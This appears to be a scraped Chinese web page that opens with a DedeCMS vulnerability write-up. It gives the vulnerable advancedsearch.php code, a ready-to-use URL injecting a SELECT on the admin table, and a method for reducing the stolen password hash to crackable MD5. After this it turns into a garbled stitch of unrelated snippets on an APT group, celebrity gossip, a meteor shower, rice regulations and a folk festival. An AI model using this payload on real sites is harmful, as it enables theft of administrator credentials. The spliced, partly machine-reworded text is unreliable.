漏洞描述:
健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。高效率标签缓存机制:允许对类同的标签进行缓存,在生成 HTML的时候,有利于提高系统反应速度,降低系统消耗的资源。模型与模块概念并存:在模型不能满足用户所有需求的情况下,DedeCMS推出一些互动的模块对系统进行补充,尽量满足用户的需求。
plus/advancedsearch.php
$sql 变量未初始化。导致鸡助漏洞
复制代码代码如下:
if($mid == 0) //必须绕过。
{
showmsg('参数不正确,高级自定义搜索必须指定模型id', 'javascript');
exit();
}
$query = "select maintable, mainfields, addontable, addonfields, template from dede_advancedsearch where mid='$mid'";
$searchinfo = $dsql->GetOne($query);
if(!is_array($searchinfo)) //囧啊,绕过有难度。
{
showmsg('自定义搜索模型不存在','-1'); exit();
}
$template = $searchinfo['template'] != '' ? $searchinfo['template'] : 'advancedsearch.htm';
if(empty($sql)) //人品问题,成功绕过!{
..............
}else{
$sql = urldecode($sql);
$query = $sql;
}
$sql = urlencode($sql);
$dlist = new DataListCP();
$dlist->pageSize = 20;
$dlist->SetParameter("sql", $sql);
$dlist->SetParameter("mid", $mid);
...............
$dlist->SetTemplate($templatefile);
$dlist->SetSource($query);
.............<*参考
*>
测试 *** :
本站提供程序( *** )可能带有攻击性,仅供安全研究与教学之用,风险自负!
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码, *** 是,前减3后减1,得到16位MD5
option broadcast-address 192.168.1.101; type = "theme"; //resName +=...
MuddyWater是一个APT安排,主要以中东国家的政府安排和电信部分为进犯方针,所插手的国家包含伊拉克、沙特阿拉伯、巴林、约旦、土耳其和黎巴嫩,也包含一些中东附近地区的国家,如阿塞拜疆、巴基斯坦和...
网络红人半藏森林晒出了一组泳装照,曾第三者插足刘阳阿沁,致两个人提出分手的。 有趣的是,王思聪评价此条动态性。 不认识网络大v圈的人半藏森林的姓名很有可能不太清晰。上年,阿琴和刘洋在网络大v圈提出分手...
象限仪流星雨与英仙座流星雨和双子座流星雨,被并称为全球三大流星雨。 据广州市五羊天象馆1月1日透露,从每年12月28日至次年1月12日,地球轨道与象限仪流星群轨道交集,象限仪流星群成为全年第一个上演...
网友:倘若你一直在淘宝卖大米,你需要产品质量检验汇报和食品卫生安全安全性许可证号吗? 国家药品药品监督管理局:经食品行业商品流通企业管理机构认真审查,网络销售的散称大米属于食用农产品销售市场。...
二月二的传说(二月二百思特网,龙百思特网抬头”的传说与民间习俗) q “二月二,龙抬头”的传说与民间习俗 在我的家乡垣曲东原,一直流行有“二月二,龙抬头的”传统风俗。东原人还把这一天,当...